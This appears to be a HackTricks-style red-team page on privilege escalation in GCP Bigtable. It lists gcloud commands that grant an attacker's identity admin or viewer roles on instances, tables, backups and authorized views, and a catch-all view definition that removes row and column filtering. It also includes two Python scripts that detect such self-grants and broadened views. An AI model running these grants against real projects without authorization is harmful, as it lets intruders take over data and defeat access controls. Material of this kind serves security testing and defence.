# GCP - Bigtable Privesc

Tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

## Bigtable

For more information about Bigtable check:

GCP - Bigtable Enum

### `bigtable.instances.setIamPolicy`

**Permission:** `bigtable.instances.setIamPolicy` (and usually `bigtable.instances.getIamPolicy` to read the current bindings).

Owning the IAM policy of an instance lets you grant yourself `roles/bigtable.admin` (or any custom role), which cascades to every cluster, table, backup and authorized view in the instance.

<details><summary>Grant yourself the bigtable.admin role on the instance</summary>

```bash
# Add a binding for your own identity on the target instance
gcloud bigtable instances add-iam-policy-binding <instance-id> \
  --member='user:<attacker@example.com>' \
  --role='roles/bigtable.admin'
```

</details>

> **Tip:** If you cannot list the existing bindings, build a fresh policy document and push it with `gcloud bigtable instances set-iam-policy`, as long as you include yourself in it.

Once you have this permission, check the [**Bigtable Post Exploitation section**](../gcp-post-exploitation/gcp-bigtable-post-exploitation.md) for more techniques to abuse Bigtable permissions.

### `bigtable.tables.setIamPolicy`

**Permission:** `bigtable.tables.setIamPolicy` (optionally `bigtable.tables.getIamPolicy`).

Instance policies may be locked down while an individual table is delegated. If you can edit the IAM policy of a table you can promote yourself to owner of the target dataset without touching other workloads.

<details><summary>Grant yourself the bigtable.admin role on the table</summary>

```bash
# Add a binding for your own identity on a single table
gcloud bigtable tables add-iam-policy-binding <table-id> \
  --instance=<instance-id> \
  --member='user:<attacker@example.com>' \
  --role='roles/bigtable.admin'
```

</details>

Once you have this permission, check the [**Bigtable Post Exploitation section**](../gcp-post-exploitation/gcp-bigtable-post-exploitation.md) for more techniques to abuse Bigtable permissions.

### `bigtable.backups.setIamPolicy`

**Permission:** `bigtable.backups.setIamPolicy`

Backups can be restored to any instance in any project you control. First grant your identity access to the backup, then restore it into a sandbox where you hold Admin/Owner rights.

If you have the `bigtable.backups.setIamPolicy` permission you can grant yourself `bigtable.backups.restore`, restore old backups and look for sensitive information in them.

<details><summary>Take ownership of the backup snapshot</summary>

```bash
# Take ownership of the snapshot (backups live under a cluster of the instance)
gcloud bigtable backups add-iam-policy-binding <backup-id> \
  --instance=<instance-id> --cluster=<cluster-id> \
  --member='user:<attacker@example.com>' \
  --role='roles/bigtable.admin'
```

</details>

Once you have this permission, check the [**Bigtable Post Exploitation section**](../gcp-post-exploitation/gcp-bigtable-post-exploitation.md) to see how to restore backups.
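The three `setIamPolicy` abuses above share one detection signal: an Admin Activity audit log entry in which a principal writes a Bigtable IAM policy that gives `roles/bigtable.admin` to a non-approved member, most tellingly to the caller's own identity. The following Python script is an added example for defenders, not code from the original page or from Google; it runs over constructed newline-delimited audit log entries embedded inline. The Cloud Audit Logs method names, the `protoPayload.request.policy.bindings` location of the new policy, the allowlist `APPROVED` and all project, instance and user names are assumptions to verify against your own log export.

```python
import json
from dataclasses import dataclass

# Roles that grant broad control over Bigtable data. roles/bigtable.admin is the
# one the page's commands grant; owner/editor are included because they imply it.
PRIVILEGED_ROLES = {"roles/bigtable.admin", "roles/owner", "roles/editor"}

# Audit log method names for Bigtable IAM policy writes (assumption: confirm
# against your own project's Admin Activity logs before relying on them).
BIGTABLE_SETIAM_METHODS = {
    "google.bigtable.admin.v2.BigtableInstanceAdmin.SetIamPolicy",
    "google.bigtable.admin.v2.BigtableTableAdmin.SetIamPolicy",
}


@dataclass(frozen=True)
class Finding:
    principal: str      # who made the SetIamPolicy call
    resource: str       # instance / table / backup / authorized view path
    resource_kind: str
    role: str
    member: str         # who received the role
    self_grant: bool    # the caller granted the role to their own identity


def resource_kind(name: str) -> str:
    """Classify a Bigtable resource path by its most specific component."""
    if "/authorizedViews/" in name:
        return "authorizedView"
    if "/backups/" in name:
        return "backup"
    if "/tables/" in name:
        return "table"
    if "/instances/" in name:
        return "instance"
    return "unknown"


def analyze_entry(entry: dict, approved_members: set) -> list:
    """Return findings for one audit log entry (a dict), or [] if benign."""
    payload = entry.get("protoPayload", {})
    if payload.get("methodName") not in BIGTABLE_SETIAM_METHODS:
        return []
    principal = payload.get("authenticationInfo", {}).get("principalEmail", "").lower()
    resource = payload.get("resourceName", "")
    findings = []
    # The full new policy is in the request body: flag privileged roles given to
    # anyone outside the allowlist and mark grants the caller gave themselves.
    for binding in payload.get("request", {}).get("policy", {}).get("bindings", []):
        role = binding.get("role", "")
        if role not in PRIVILEGED_ROLES:
            continue
        for member in binding.get("members", []):
            if member in approved_members:
                continue
            identity = member.split(":", 1)[-1].lower()   # strip "user:" / "group:"
            findings.append(Finding(principal, resource, resource_kind(resource),
                                    role, member, identity == principal))
    return findings


def analyze_log(ndjson: str, approved_members: set) -> list:
    """Run analyze_entry over a newline-delimited JSON log export."""
    findings = []
    for line in ndjson.splitlines():
        if line.strip():
            findings.extend(analyze_entry(json.loads(line), approved_members))
    return findings


# Constructed sample entries (not real logs): a routine change by an approved
# admin, a self-grant on an instance, and a grant on a backup to a third party.
SAMPLE_LOG = "\n".join(json.dumps(e) for e in [
    {"protoPayload": {
        "methodName": "google.bigtable.admin.v2.BigtableInstanceAdmin.SetIamPolicy",
        "authenticationInfo": {"principalEmail": "platform-admin@example.com"},
        "resourceName": "projects/demo-proj/instances/prod-bt",
        "request": {"policy": {"bindings": [
            {"role": "roles/bigtable.admin", "members": ["group:bt-admins@example.com"]}]}}}},
    {"protoPayload": {
        "methodName": "google.bigtable.admin.v2.BigtableInstanceAdmin.SetIamPolicy",
        "authenticationInfo": {"principalEmail": "dev@example.com"},
        "resourceName": "projects/demo-proj/instances/prod-bt",
        "request": {"policy": {"bindings": [
            {"role": "roles/bigtable.admin",
             "members": ["group:bt-admins@example.com", "user:dev@example.com"]}]}}}},
    {"protoPayload": {
        "methodName": "google.bigtable.admin.v2.BigtableTableAdmin.SetIamPolicy",
        "authenticationInfo": {"principalEmail": "dev@example.com"},
        "resourceName": "projects/demo-proj/instances/prod-bt/clusters/c1/backups/nightly-01",
        "request": {"policy": {"bindings": [
            {"role": "roles/bigtable.admin", "members": ["user:someone-else@example.com"]}]}}}},
])
APPROVED = {"group:bt-admins@example.com"}

if __name__ == "__main__":
    for f in analyze_log(SAMPLE_LOG, APPROVED):
        tag = "SELF-GRANT" if f.self_grant else "GRANT"
        print(f"{tag}: {f.principal} gave {f.member} {f.role} on {f.resource_kind} {f.resource}")
```

The allowlist is keyed on the full member string (`group:...`, `user:...`, `serviceAccount:...`) so that a lookalike user with an approved group's mailbox name is not silently accepted; self-grants are reported separately because they are the pattern this page describes and are rarely legitimate outside break-glass procedures.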

### Update authorized view

**Permission:** `bigtable.authorizedViews.update`

Authorized Views are meant to hide rows/columns. Modifying or deleting them removes the fine-grained controls that defending teams rely on.

<details><summary>Update the authorized view to broaden access</summary>

```bash
# Describe the authorized view to get a column family name
gcloud bigtable authorized-views describe <view-id> \
  --instance=<instance-id> --table=<table-id>

# JSON example not filtering any row or column: the empty prefix "" matches
# every row key and every qualifier of the named family
cat <<'EOF' > /tmp/permissive-view.json
{
  "subsetView": {
    "rowPrefixes": [""],
    "familySubsets": {
      "<family-name>": {
        "qualifierPrefixes": [""]
      }
    }
  }
}
EOF

# Broaden the subset by uploading the permissive definition
gcloud bigtable authorized-views update <view-id> \
  --instance=<instance-id> --table=<table-id> \
  --definition-file=/tmp/permissive-view.json --ignore-warnings
```

</details>

Once you have this permission, check the [**Bigtable Post Exploitation section**](../gcp-post-exploitation/gcp-bigtable-post-exploitation.md) to see how to read from the Authorized View.
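The JSON above is dangerous precisely because an empty prefix matches everything, so a review step that compares the old and new `subsetView` definitions can catch this kind of change before it is applied (or flag it afterwards from the `describe` output). The Python below is an added example for reviewers and is not code from the page or from Google. It works on the plain-string prefix form the page's JSON uses; in the Bigtable Admin API `rowPrefixes` are base64-encoded bytes and would need decoding first (assumption). The `qualifiers` field, the `pii` family name and both sample definitions are constructed for the example.

```python
import json


def _covered(prefixes, target: str) -> bool:
    """True if some prefix in `prefixes` is a prefix of `target`.
    The empty prefix "" covers every possible target."""
    return any(target.startswith(p) for p in prefixes)


def _families(definition: dict) -> dict:
    return definition.get("subsetView", {}).get("familySubsets", {})


def _family_prefixes(subset: dict) -> list:
    # Exact qualifiers are treated as prefixes of themselves so both forms compare
    # (assumption: `qualifiers` holds exact column names next to `qualifierPrefixes`).
    return list(subset.get("qualifierPrefixes", [])) + list(subset.get("qualifiers", []))


def permissive_findings(definition: dict) -> list:
    """Flag subsetView parts that expose everything, as in the page's example."""
    sv = definition.get("subsetView", {})
    findings = []
    if "" in sv.get("rowPrefixes", []):
        findings.append('rowPrefixes contains "": every row key of the table is exposed')
    for family, subset in _families(definition).items():
        if "" in subset.get("qualifierPrefixes", []):
            findings.append(f'family {family!r}: qualifierPrefixes contains "": every column exposed')
    return findings


def covers(a: dict, b: dict) -> bool:
    """True if view `a` exposes at least everything view `b` exposes."""
    a_rows = a.get("subsetView", {}).get("rowPrefixes", [])
    b_rows = b.get("subsetView", {}).get("rowPrefixes", [])
    if not all(_covered(a_rows, r) for r in b_rows):
        return False
    a_fam = _families(a)
    for family, b_subset in _families(b).items():
        if family not in a_fam:
            return False
        a_prefixes = _family_prefixes(a_fam[family])
        if not all(_covered(a_prefixes, q) for q in _family_prefixes(b_subset)):
            return False
    return True


def broadens(old: dict, new: dict) -> bool:
    """True if `new` exposes a strict superset of what `old` exposed."""
    return covers(new, old) and not covers(old, new)


def review(old_json: str, new_json: str) -> dict:
    """Entry point for an approval check: verdict plus the reasons behind it."""
    old, new = json.loads(old_json), json.loads(new_json)
    return {"broadens": broadens(old, new), "permissive": permissive_findings(new)}


# Constructed definitions (not from any real instance). ORIGINAL is a narrow view;
# PERMISSIVE has the shape of the page's example with "pii" as the family name.
ORIGINAL = {"subsetView": {"rowPrefixes": ["customer#"],
                           "familySubsets": {"pii": {"qualifierPrefixes": ["email"]}}}}
PERMISSIVE = {"subsetView": {"rowPrefixes": [""],
                             "familySubsets": {"pii": {"qualifierPrefixes": [""]}}}}

if __name__ == "__main__":
    print(json.dumps(review(json.dumps(ORIGINAL), json.dumps(PERMISSIVE)), indent=2))
```

`broadens` is deliberately asymmetric: shrinking a view (removing a family or lengthening a prefix) returns `False`, so only changes that widen what a view reader can see need a second approver, while `permissive_findings` catches the catch-all definition even when there is no previous version to compare against.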

### `bigtable.authorizedViews.setIamPolicy`

**Permission:** `bigtable.authorizedViews.setIamPolicy`.

An attacker with this permission can grant themselves access to an Authorized View, which may contain sensitive data they could not otherwise reach.

<details><summary>Grant yourself access to the Authorized View</summary>

```bash
# Give more permissions over an existing view
gcloud bigtable authorized-views add-iam-policy-binding <view-id> \
  --instance=<instance-id> --table=<table-id> \
  --member='user:<attacker@example.com>' \
  --role='roles/bigtable.viewer'
```

</details>

Once you have this permission, check the [**Bigtable Post Exploitation section**](../gcp-post-exploitation/gcp-bigtable-post-exploitation.md) to see how to read from the authorized view.
